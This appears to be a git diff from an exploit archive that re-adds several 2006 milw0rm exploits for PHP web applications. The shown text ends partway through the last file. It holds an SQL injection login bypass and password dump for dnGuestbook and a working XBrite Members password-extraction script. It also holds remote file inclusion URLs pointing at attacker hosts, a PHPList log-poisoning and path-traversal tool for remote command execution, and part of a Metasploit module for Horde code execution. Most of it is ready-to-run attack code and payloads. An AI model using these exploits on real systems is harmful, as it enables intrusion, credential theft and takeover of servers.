+  description: because of the false implemented userinputs you can login as admin with a simpel sql injection.
+               afterward you can exploit a not validated GET variable to get admin's email and password.
+  fingerprint: google -> "dnGuestbook by design-nation.de Version" -> 331
+               msn -> "dnGuestbook by design-nation.de Version" -> 249
+   conditions: php.ini -> magic_quotes_gpc = Off
+       greets: all security guys and coders over the world, honkey :>, ..
+
+
+
+---------- LOGIN AS ADMIN ----------
+
+admin.php - line 771, 772
+  $result = mysql_query ("SELECT * FROM dnguestbook_user WHERE mail='$mail' AND passwort='$passwort';");
+  $eingeloggt = mysql_num_rows($result);
+
+if magic_quotes_gpc is off, the ' won't be escaped and you can inject malicious sql code here.
+the script only verifies if a result is given back, and doesn't check, if the entered email and 
+password are the same like the email and password in the database.
+
+you gonna log in with following username (the password isn't necessary):
+
+E-Mail: ' OR 1 = 1 /*
+Passwort: b0000m
+
+the query would look like this:
+
+  SELECT * FROM dnguestbook_user WHERE mail='' OR 1 = 1 /* AND passwort='b0000m'
+
+the expression "/*" comments out the following part of the query.
+the query will match always, because the WHERE - clause with "OR 1 = 1" is always true.
+
+now you are logged in as admin. how will you get the admin password?
+
+
+---------- GET ADMIN PASSWORD ----------
+
+in the adminpanel, you click the link "Beiträge". after that, you click the [e] right of a guestbook
+entry. it doesn't matter which entry you choose. normally, you can edit here some guestbok entries.
+the uri will look like this:
+
+  http://yourhost.com/path_to_gb/admin.php?gbgo=edit&id=8
+  
+two variables are transmitted over GET but only "id=8" is relevant for us.
+
+admin.php - line 678
+  $result = mysql_query ("SELECT * FROM dnguestbook_eintrag WHERE id=$id;");
+
+you see, that the variable "id" isn't validated. you can inject malicious sql code again.
+we make use of the UNION operator.
+
+ http://yourhost.com/path_to_gb/admin.php?gbgo=edit&id=-999%20union%20select%200,passwort,0,mail,mail,mail,mail,0,0,passwort%20from%20dnguestbook_user
+
+the admin's email is shown in the field "*Ihre E-Mail:" and the admin's password in the field "*Ihr Text:" (plaintext !!)
+
+description of the UNION operator:
+  http://dev.mysql.com/doc/refman/5.0/en/union.html
+
+# milw0rm.com [2006-04-09]
diff --git a/platforms/php/webapps/1654.txt b/platforms/php/webapps/1654.txt
index 792e52554..d6c3d79d5 100755
--- a/platforms/php/webapps/1654.txt
+++ b/platforms/php/webapps/1654.txt
@@ -1,28 +1,28 @@
-Autonomous LAN party File iNclusion 
-
---------------------------------------------
-Site:http://www.nerdclub.net/alp/
-Demo:http://www.redfiles.net/cup/credits.php
-
---------------------------------------------
-Example:
-
-http://victim.com/path/include/SQuery/gameSpy2.php?libpath=http://evilsite
-
----------------------------------------------
-Credit:Codexploder'tq
-Mail  :codexploder@linuxmail.org
-site  :www.biyo.tk www.biyosecurity.be
-
----------------------------------------------
-Google:
-
-intitle:"Autonomous LAN party"
-
---------------------------------------------
-Source:
-
-http://liz0zim.no-ip.org/alp.txt
-http://www.blogcu.com/Liz0ziM/431845/
-
-# milw0rm.com [2006-04-09]
+Autonomous LAN party File iNclusion 
+
+--------------------------------------------
+Site:http://www.nerdclub.net/alp/
+Demo:http://www.redfiles.net/cup/credits.php
+
+--------------------------------------------
+Example:
+
+http://victim.com/path/include/SQuery/gameSpy2.php?libpath=http://evilsite
+
+---------------------------------------------
+Credit:Codexploder'tq
+Mail  :codexploder@linuxmail.org
+site  :www.biyo.tk www.biyosecurity.be
+
+---------------------------------------------
+Google:
+
+intitle:"Autonomous LAN party"
+
+--------------------------------------------
+Source:
+
+http://liz0zim.no-ip.org/alp.txt
+http://www.blogcu.com/Liz0ziM/431845/
+
+# milw0rm.com [2006-04-09]
diff --git a/platforms/php/webapps/1655.php b/platforms/php/webapps/1655.php
index 6ecbd4d22..db59d4132 100755
--- a/platforms/php/webapps/1655.php
+++ b/platforms/php/webapps/1655.php
@@ -1,83 +1,83 @@
- "Powered By XBrite Members" -> 2800
-               msn -> "Powered By XBrite Members" ->  581
-   conditions: php.ini -> magic_quotes_gpc = Off
-       greets: all security guys and coders over the world, honkey :>, ..
- terms of use: this exploit is just for educational purposes, do not use it for illegal acts.
-
-
----------------------------- members.php - line 197 -------------------------------------
-$query = @mysql_query ("select * from oz_members where id='".$_GET['id']."'");
------------------------------------------------------------------------------------------
-
-because magic_quotes_gpc is off, you can break out of the singel quotes and insert malicious sql code,
-i.e. with a union operator.
-
-
-*/
-
-/*********************** CONFIGURATION ****************************/
-
-$PATH_TO_FILE  = 'http://yourhost.com/member.php';                 // in example: http://yourhost.com/member.php
-$USER_ID       = 1;                                                // from which user id do you want the password? default: 1
-$GET_VARS      = '?action=members&act=show&id=';                   // do not change
-$SQL_INJECTION = '0\' union select 1,1,1,1,1,1,1,1,1,real_name'.   // do not change
-                 ',name,pw,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,'.
-				 '1,1,1,1,1,1,1,1,1,1,1,1 from oz_members where '.
-				 'id = '.$USER_ID.' /*';
-
-
-/**************************** MAIN ********************************/
-
-$file_array = file($PATH_TO_FILE.$GET_VARS.urlencode($SQL_INJECTION))or die('couldn\'t open host!'); 
-foreach ($file_array as $now)                               
-	$html_content .= $now;
-
-$html_content = str_castrate($html_content);
-
-preg_match_all("!Alter:(.*?)!",$html_content,$username); /* gets username */
-preg_match_all("!Herkunft:(.*?)!",$html_content,$password); /* gets password */
-
-if ($username[1][0] && $password[1][0] && $username[1][0] <> 'keineAngabe') {
-	echo 'username: '.$username[1][0].'
    ';
-	echo 'password: '.$password[1][0].'';
-}else {
-	echo 'exploit failed! 
    magic_quotes_gpc = Off ?';
-}
-echo '




    
-======================================================================
    
-exploit: XBrite Members <= 1.1 remote sql injection vulnerability
    
-release: 2006-04-09
    
-author: snatcher [snatcher at gmx.ch]
    
-======================================================================';
-
-function str_castrate($string) {
-	$string = str_replace("\n", '', $string);
-	$string = str_replace("\r", '', $string);
-	$string = str_replace(" ", '', $string);
-	return $string;
-}
-?>
-
-# milw0rm.com [2006-04-09]
+ "Powered By XBrite Members" -> 2800
+               msn -> "Powered By XBrite Members" ->  581
+   conditions: php.ini -> magic_quotes_gpc = Off
+       greets: all security guys and coders over the world, honkey :>, ..
+ terms of use: this exploit is just for educational purposes, do not use it for illegal acts.
+
+
+---------------------------- members.php - line 197 -------------------------------------
+$query = @mysql_query ("select * from oz_members where id='".$_GET['id']."'");
+-----------------------------------------------------------------------------------------
+
+because magic_quotes_gpc is off, you can break out of the singel quotes and insert malicious sql code,
+i.e. with a union operator.
+
+
+*/
+
+/*********************** CONFIGURATION ****************************/
+
+$PATH_TO_FILE  = 'http://yourhost.com/member.php';                 // in example: http://yourhost.com/member.php
+$USER_ID       = 1;                                                // from which user id do you want the password? default: 1
+$GET_VARS      = '?action=members&act=show&id=';                   // do not change
+$SQL_INJECTION = '0\' union select 1,1,1,1,1,1,1,1,1,real_name'.   // do not change
+                 ',name,pw,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,'.
+				 '1,1,1,1,1,1,1,1,1,1,1,1 from oz_members where '.
+				 'id = '.$USER_ID.' /*';
+
+
+/**************************** MAIN ********************************/
+
+$file_array = file($PATH_TO_FILE.$GET_VARS.urlencode($SQL_INJECTION))or die('couldn\'t open host!'); 
+foreach ($file_array as $now)                               
+	$html_content .= $now;
+
+$html_content = str_castrate($html_content);
+
+preg_match_all("!Alter:(.*?)!",$html_content,$username); /* gets username */
+preg_match_all("!Herkunft:(.*?)!",$html_content,$password); /* gets password */
+
+if ($username[1][0] && $password[1][0] && $username[1][0] <> 'keineAngabe') {
+	echo 'username: '.$username[1][0].'
    ';
+	echo 'password: '.$password[1][0].'';
+}else {
+	echo 'exploit failed! 
    magic_quotes_gpc = Off ?';
+}
+echo '




    
+======================================================================
    
+exploit: XBrite Members <= 1.1 remote sql injection vulnerability
    
+release: 2006-04-09
    
+author: snatcher [snatcher at gmx.ch]
    
+======================================================================';
+
+function str_castrate($string) {
+	$string = str_replace("\n", '', $string);
+	$string = str_replace("\r", '', $string);
+	$string = str_replace(" ", '', $string);
+	return $string;
+}
+?>
+
+# milw0rm.com [2006-04-09]
diff --git a/platforms/php/webapps/1656.txt b/platforms/php/webapps/1656.txt
index 12e520b41..4e3cc6c48 100755
--- a/platforms/php/webapps/1656.txt
+++ b/platforms/php/webapps/1656.txt
@@ -1,39 +1,39 @@
-[+]File Inclusion:
-       Input passed to the "rub" parameter in "lire.php" isn't properly verified,
-       before it is used to include remote files
-       Successful exploitation requires that "register_globals" is enabled.
-
-[lire.php code]
-
-
-[+]Exploit: Exploit http://[trajet]/lire.php?rub=http://[attacker]&cahier=1&art=1
-[+]http://[attacker]/compter.php Will be Included And Executed withe the privilege of the webserver
-
-
-File Upload
-Remote User can Upload jpg,jpeg,gif,bmp files without Identification ,
-[upload.php code:]
-
-Exploit :
-
-
    
-Download File
    
-
    
-
-
-[Moroccan Security Team]
-
-contact:
-simo64[at]gmail[dot]com
-
-# milw0rm.com [2006-04-09]
+[+]File Inclusion:
+       Input passed to the "rub" parameter in "lire.php" isn't properly verified,
+       before it is used to include remote files
+       Successful exploitation requires that "register_globals" is enabled.
+
+[lire.php code]
+
+
+[+]Exploit: Exploit http://[trajet]/lire.php?rub=http://[attacker]&cahier=1&art=1
+[+]http://[attacker]/compter.php Will be Included And Executed withe the privilege of the webserver
+
+
+File Upload
+Remote User can Upload jpg,jpeg,gif,bmp files without Identification ,
+[upload.php code:]
+
+Exploit :
+
+
+Download File
    
+
    
+
+
+[Moroccan Security Team]
+
+contact:
+simo64[at]gmail[dot]com
+
+# milw0rm.com [2006-04-09]
diff --git a/platforms/php/webapps/1659.php b/platforms/php/webapps/1659.php
index a336bbb98..9884a74cf 100755
--- a/platforms/php/webapps/1659.php
+++ b/platforms/php/webapps/1659.php
@@ -1,227 +1,227 @@
-#!/usr/bin/php -q -d short_open_tag=on
- this works against register_globals=On \r\n";
-echo "a dork: inurl:\"lists/?p=subscribe\" | inurl:\"lists/index.php?p=subscribe\"\r\n";
-echo " -ubbi phplist\r\n\r\n";
-
-if ($argc<4) {
-echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to PHPList\r\n";
-echo "cmd:       a shell command\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /lists/ cat ./config/config.php\r\n";
-echo "php ".$argv[0]." localhost /lists/ ls -la -p81\r\n";
-echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
-die;
-}
-
-/*
-software site: http://tincan.co.uk/phplist
-
-description: PHPlist is a double opt-in newsletter manager. It is written in PHP
-and uses an SQL database for storing the information
-
-vulnerability:
-vulnerable code in lists/index.php at lines 18-28:
-...
-if (isset($GLOBALS["developer_email"])) {
-  error_reporting(E_ALL);
-} else {
-  error_reporting(0);
-}
-require_once dirname(__FILE__) .'/admin/commonlib/lib/magic_quotes.php';
-
-require_once dirname(__FILE__).'/admin/init.php';
-require_once dirname(__FILE__).'/admin/'.$GLOBALS["database_module"];
-require_once dirname(__FILE__)."/texts/english.inc";
-include_once dirname(__FILE__)."/texts/".$GLOBALS["language_module"];
-...
-
-a lack in the code:
-$database_module and $language_module vars are properly initialized in
-config/config.php, but... when code would use them to include files
-they are called with their GLOBALS corresponding vars.
-So, if register_globals = On in php.ini you can include arbitrary file from
-local resources, poc:
-
-http://[target]/[path_to_phplist]/lists/index.php?GLOBALS[developer_email]=1&GLOBALS[database_module]=../../../../../../etc/passwd
-
-also you can turn on all php messages and warnings until language_module is
-called, as you can see.
-This tool inject some code in log files and try to include them to
-launch commands on target machine
-                                                                              */
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-function make_seed()
-{
-   list($usec, $sec) = explode(' ', microtime());
-   return (float) $sec + ((float) $usec * 100000);
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$cmd="";$port=80;$proxy="";
-
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-echo "[1] Injecting some code in log files ...\r\n";
-$CODE="";
-$packet="GET ".$p.$CODE." HTTP/1.0\r\n";
-$packet.="User-Agent: ".$CODE." Googlebot/2.1\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: close\r\n\r\n";
-sendpacketii($packet);
-sleep(1);
-
-$paths=array(
-"../../../../../../../../../../var/log/httpd/access_log",
-"../../../../../../../../../../var/log/httpd/error_log",
-"../apache/logs/error.log",
-"../apache/logs/access.log",
-"../../apache/logs/error.log",
-"../../apache/logs/access.log",
-"../../../apache/logs/error.log",
-"../../../apache/logs/access.log",
-"../../../../apache/logs/error.log",
-"../../../../apache/logs/access.log",
-"../../../../../apache/logs/error.log",
-"../../../../../apache/logs/access.log",
-"../../../../../../apache/logs/error.log",
-"../../../../../../apache/logs/access.log",
-"../logs/error.log",
-"../logs/access.log",
-"../../logs/error.log",
-"../../logs/access.log",
-"../../../logs/error.log",
-"../../../logs/access.log",
-"../../../../logs/error.log",
-"../../../../logs/access.log",
-"../../../../../logs/error.log",
-"../../../../../logs/access.log",
-"../../../../../../logs/error.log",
-"../../../../../../logs/access.log",
-"../../../../../../../../../../etc/httpd/logs/acces_log",
-"../../../../../../../../../../etc/httpd/logs/acces.log",
-"../../../../../../../../../../etc/httpd/logs/error_log",
-"../../../../../../../../../../etc/httpd/logs/error.log",
-"../../../../../../../../../../var/www/logs/access_log",
-"../../../../../../../../../../var/www/logs/access.log",
-"../../../../../../../../../../usr/local/apache/logs/access_log",
-"../../../../../../../../../../usr/local/apache/logs/access.log",
-"../../../../../../../../../../var/log/apache/access_log",
-"../../../../../../../../../../var/log/apache/access.log",
-"../../../../../../../../../../var/log/access_log",
-"../../../../../../../../../../var/www/logs/error_log",
-"../../../../../../../../../../var/www/logs/error.log",
-"../../../../../../../../../../usr/local/apache/logs/error_log",
-"../../../../../../../../../../usr/local/apache/logs/error.log",
-"../../../../../../../../../../var/log/apache/error_log",
-"../../../../../../../../../../var/log/apache/error.log",
-"../../../../../../../../../../var/log/access_log",
-"../../../../../../../../../../var/log/error_log"
-);
-
-for ($i=0; $i<=count($paths)-1; $i++)
-{
-$a=$i+2;
-echo "[".$a."] Trying with: ".$paths[$i]."\r\n";
-$packet ="GET ".$p."index.php?GLOBALS[developer_email]=1&GLOBALS[database_module]=".$paths[$i];
-$packet.="&GLOBALS[language_module]=".$paths[$i]."&cmd=".$cmd." HTTP/1.0\r\n";
-$packet.="User-Agent: Googlebot/2.1\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-if (strstr($html,"56789"))
-{
- $temp=explode("56789",$html);
- echo $temp[1];
- echo "\r\nExploit succeeded...\r\n";
- die;
-}
-}
-#if you are here...
-echo "Exploit failed...";
-?>
-
-# milw0rm.com [2006-04-10]
+#!/usr/bin/php -q -d short_open_tag=on
+ this works against register_globals=On \r\n";
+echo "a dork: inurl:\"lists/?p=subscribe\" | inurl:\"lists/index.php?p=subscribe\"\r\n";
+echo " -ubbi phplist\r\n\r\n";
+
+if ($argc<4) {
+echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to PHPList\r\n";
+echo "cmd:       a shell command\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /lists/ cat ./config/config.php\r\n";
+echo "php ".$argv[0]." localhost /lists/ ls -la -p81\r\n";
+echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
+die;
+}
+
+/*
+software site: http://tincan.co.uk/phplist
+
+description: PHPlist is a double opt-in newsletter manager. It is written in PHP
+and uses an SQL database for storing the information
+
+vulnerability:
+vulnerable code in lists/index.php at lines 18-28:
+...
+if (isset($GLOBALS["developer_email"])) {
+  error_reporting(E_ALL);
+} else {
+  error_reporting(0);
+}
+require_once dirname(__FILE__) .'/admin/commonlib/lib/magic_quotes.php';
+
+require_once dirname(__FILE__).'/admin/init.php';
+require_once dirname(__FILE__).'/admin/'.$GLOBALS["database_module"];
+require_once dirname(__FILE__)."/texts/english.inc";
+include_once dirname(__FILE__)."/texts/".$GLOBALS["language_module"];
+...
+
+a lack in the code:
+$database_module and $language_module vars are properly initialized in
+config/config.php, but... when code would use them to include files
+they are called with their GLOBALS corresponding vars.
+So, if register_globals = On in php.ini you can include arbitrary file from
+local resources, poc:
+
+http://[target]/[path_to_phplist]/lists/index.php?GLOBALS[developer_email]=1&GLOBALS[database_module]=../../../../../../etc/passwd
+
+also you can turn on all php messages and warnings until language_module is
+called, as you can see.
+This tool inject some code in log files and try to include them to
+launch commands on target machine
+                                                                              */
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+function make_seed()
+{
+   list($usec, $sec) = explode(' ', microtime());
+   return (float) $sec + ((float) $usec * 100000);
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$cmd="";$port=80;$proxy="";
+
+for ($i=3; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+echo "[1] Injecting some code in log files ...\r\n";
+$CODE="";
+$packet="GET ".$p.$CODE." HTTP/1.0\r\n";
+$packet.="User-Agent: ".$CODE." Googlebot/2.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: close\r\n\r\n";
+sendpacketii($packet);
+sleep(1);
+
+$paths=array(
+"../../../../../../../../../../var/log/httpd/access_log",
+"../../../../../../../../../../var/log/httpd/error_log",
+"../apache/logs/error.log",
+"../apache/logs/access.log",
+"../../apache/logs/error.log",
+"../../apache/logs/access.log",
+"../../../apache/logs/error.log",
+"../../../apache/logs/access.log",
+"../../../../apache/logs/error.log",
+"../../../../apache/logs/access.log",
+"../../../../../apache/logs/error.log",
+"../../../../../apache/logs/access.log",
+"../../../../../../apache/logs/error.log",
+"../../../../../../apache/logs/access.log",
+"../logs/error.log",
+"../logs/access.log",
+"../../logs/error.log",
+"../../logs/access.log",
+"../../../logs/error.log",
+"../../../logs/access.log",
+"../../../../logs/error.log",
+"../../../../logs/access.log",
+"../../../../../logs/error.log",
+"../../../../../logs/access.log",
+"../../../../../../logs/error.log",
+"../../../../../../logs/access.log",
+"../../../../../../../../../../etc/httpd/logs/acces_log",
+"../../../../../../../../../../etc/httpd/logs/acces.log",
+"../../../../../../../../../../etc/httpd/logs/error_log",
+"../../../../../../../../../../etc/httpd/logs/error.log",
+"../../../../../../../../../../var/www/logs/access_log",
+"../../../../../../../../../../var/www/logs/access.log",
+"../../../../../../../../../../usr/local/apache/logs/access_log",
+"../../../../../../../../../../usr/local/apache/logs/access.log",
+"../../../../../../../../../../var/log/apache/access_log",
+"../../../../../../../../../../var/log/apache/access.log",
+"../../../../../../../../../../var/log/access_log",
+"../../../../../../../../../../var/www/logs/error_log",
+"../../../../../../../../../../var/www/logs/error.log",
+"../../../../../../../../../../usr/local/apache/logs/error_log",
+"../../../../../../../../../../usr/local/apache/logs/error.log",
+"../../../../../../../../../../var/log/apache/error_log",
+"../../../../../../../../../../var/log/apache/error.log",
+"../../../../../../../../../../var/log/access_log",
+"../../../../../../../../../../var/log/error_log"
+);
+
+for ($i=0; $i<=count($paths)-1; $i++)
+{
+$a=$i+2;
+echo "[".$a."] Trying with: ".$paths[$i]."\r\n";
+$packet ="GET ".$p."index.php?GLOBALS[developer_email]=1&GLOBALS[database_module]=".$paths[$i];
+$packet.="&GLOBALS[language_module]=".$paths[$i]."&cmd=".$cmd." HTTP/1.0\r\n";
+$packet.="User-Agent: Googlebot/2.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+if (strstr($html,"56789"))
+{
+ $temp=explode("56789",$html);
+ echo $temp[1];
+ echo "\r\nExploit succeeded...\r\n";
+ die;
+}
+}
+#if you are here...
+echo "Exploit failed...";
+?>
+
+# milw0rm.com [2006-04-10]
diff --git a/platforms/php/webapps/1660.pm b/platforms/php/webapps/1660.pm
index 6cb10bb68..078f18e4e 100755
--- a/platforms/php/webapps/1660.pm
+++ b/platforms/php/webapps/1660.pm
@@ -1,127 +1,127 @@
-##
-#        Title: Horde <= 3.0.9, 3.1.0 (Help Viewer) Remote PHP Code Execution Vulnerability
-#    Name: horde_help_module.pm
-# License: Artistic/BSD/GPL
-#         Info: Trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
-#
-#
-#  - This is an exploit module for the Metasploit Framework, please see
-#     http://metasploit.com/projects/Framework for more information.
-#
-## Coded by Inkubus 
-
-package Msf::Exploit::horde_help_module;
-use base "Msf::Exploit";
-use strict;
-use Pex::Text;
-use bytes;
-
-my $advanced = { };
-
-my $info = {
-	'Name'     => 'Horde help viewer module remote PHP code execution',
-	'Version'  => '$Revision: 1.0 $',
-	'Authors'  => [ 'inkubus < inkubus [at] inbox.lv >' ],
-	'Arch'     => [ ],
-	'OS'       => [ ],
-	'Priv'     => 0,
-	'UserOpts' =>
-	  {
-		'RHOST' => [1, 'ADDR', 'The target address'],
-		'RPORT' => [1, 'PORT', 'The target port', 80],
-		'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
-		'RPATH' => [1, 'DATA', 'Path to the Horde help module', '/horde/services/help/'],
-		'SSL'   => [0, 'BOOL', 'Use SSL'],
-	  },
-
-	'Description' => Pex::Text::Freeform(qq{
-			This module exploits an arbitrary PHP code execution flaw in the Horde web
-		mail software. This vulnerability is only present in the "Help Viewer Module".
-		Horde versions 3.0 up to 3.0.9 and 3.1.0 are vulnerable.
-}),
-
-	'Refs' =>
-	  [
-		['OSVDB', '15945'],
-		['CVE',   '2006-1491'],
-	  ],
-
-	'Payload' =>
-	  {
-		'Space' => 512,
-		'Keys'  => ['cmd', 'cmd_bash'],
-	  },
-
-	'Keys' => ['horde'],
-
-	'DisclosureDate' => 'Mar 28 2006',
-  };
-
-sub new {
-	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-	return($self);
-}
-
-sub Exploit {
-	my $self = shift;
-	my $target_host    = $self->GetVar('RHOST');
-	my $target_port    = $self->GetVar('RPORT');
-	my $vhost          = $self->GetVar('VHOST') || $target_host;
-	my $path           = $self->GetVar('RPATH');
-	my $cmd            = $self->GetVar('EncodedPayload')->RawPayload;
-
-	# Add an echo on each end for easy output capturing
-	$cmd = "echo _cmd_beg_;".$cmd.";echo _cmd_end_";
-
-	# Encode the command as a set of chr() function calls
-	my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
-
-	# Create the get request data
-	#my $data = "?do=page&template={\${passthru($byte)}}";
-	my $data = "?show=about&module=;\".passthru($byte);'.";
-
-	my $req =
-	  "GET $path$data HTTP/1.1\r\n".
-	  "Host: $vhost:$target_port\r\n".
-	  "Content-Type: application/html\r\n".
-	  "Content-Length: ". length($data)."\r\n".
-	  "Connection: Close\r\n".
-	  "\r\n";
-
-	my $s = Msf::Socket::Tcp->new(
-		'PeerAddr'  => $target_host,
-		'PeerPort'  => $target_port,
-		'LocalPort' => $self->GetVar('CPORT'),
-		'SSL'       => $self->GetVar('SSL'),
-	  );
-
-	if ($s->IsError){
-		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
-		return;
-	}
-
-	$self->PrintLine("[*] Sending the malicious Horde request...");
-
-	$s->Send($req);
-
-	my $results = $s->Recv(-1, 20);
-	$s->Close();
-
-	if ($results =~ m/_cmd_beg_(.*)_cmd_end_/ms) {
-		my $out = $1;
-		$out =~ s/^\s+|\s+$//gs;
-		if ($out) {
-			$self->PrintLine('----------------------------------------');
-			$self->PrintLine('');
-			$self->PrintLine($out);
-			$self->PrintLine('');
-			$self->PrintLine('----------------------------------------');
-		}
-	}
-	return;
-}
-
-1;
-
-# milw0rm.com [2006-04-10]
+##
+#        Title: Horde <= 3.0.9, 3.1.0 (Help Viewer) Remote PHP Code Execution Vulnerability
+#    Name: horde_help_module.pm
+# License: Artistic/BSD/GPL
+#         Info: Trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
+#
+#
+#  - This is an exploit module for the Metasploit Framework, please see
+#     http://metasploit.com/projects/Framework for more information.
+#
+## Coded by Inkubus 
+
+package Msf::Exploit::horde_help_module;
+use base "Msf::Exploit";
+use strict;
+use Pex::Text;
+use bytes;
+
+my $advanced = { };
+
+my $info = {
+	'Name'     => 'Horde help viewer module remote PHP code execution',
+	'Version'  => '$Revision: 1.0 $',
+	'Authors'  => [ 'inkubus < inkubus [at] inbox.lv >' ],
+	'Arch'     => [ ],
+	'OS'       => [ ],
+	'Priv'     => 0,
+	'UserOpts' =>
+	  {
+		'RHOST' => [1, 'ADDR', 'The target address'],
+		'RPORT' => [1, 'PORT', 'The target port', 80],
+		'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
+		'RPATH' => [1, 'DATA', 'Path to the Horde help module', '/horde/services/help/'],
+		'SSL'   => [0, 'BOOL', 'Use SSL'],
+	  },
+
+	'Description' => Pex::Text::Freeform(qq{
+			This module exploits an arbitrary PHP code execution flaw in the Horde web
+		mail software. This vulnerability is only present in the "Help Viewer Module".
+		Horde versions 3.0 up to 3.0.9 and 3.1.0 are vulnerable.
+}),
+
+	'Refs' =>
+	  [
+		['OSVDB', '15945'],
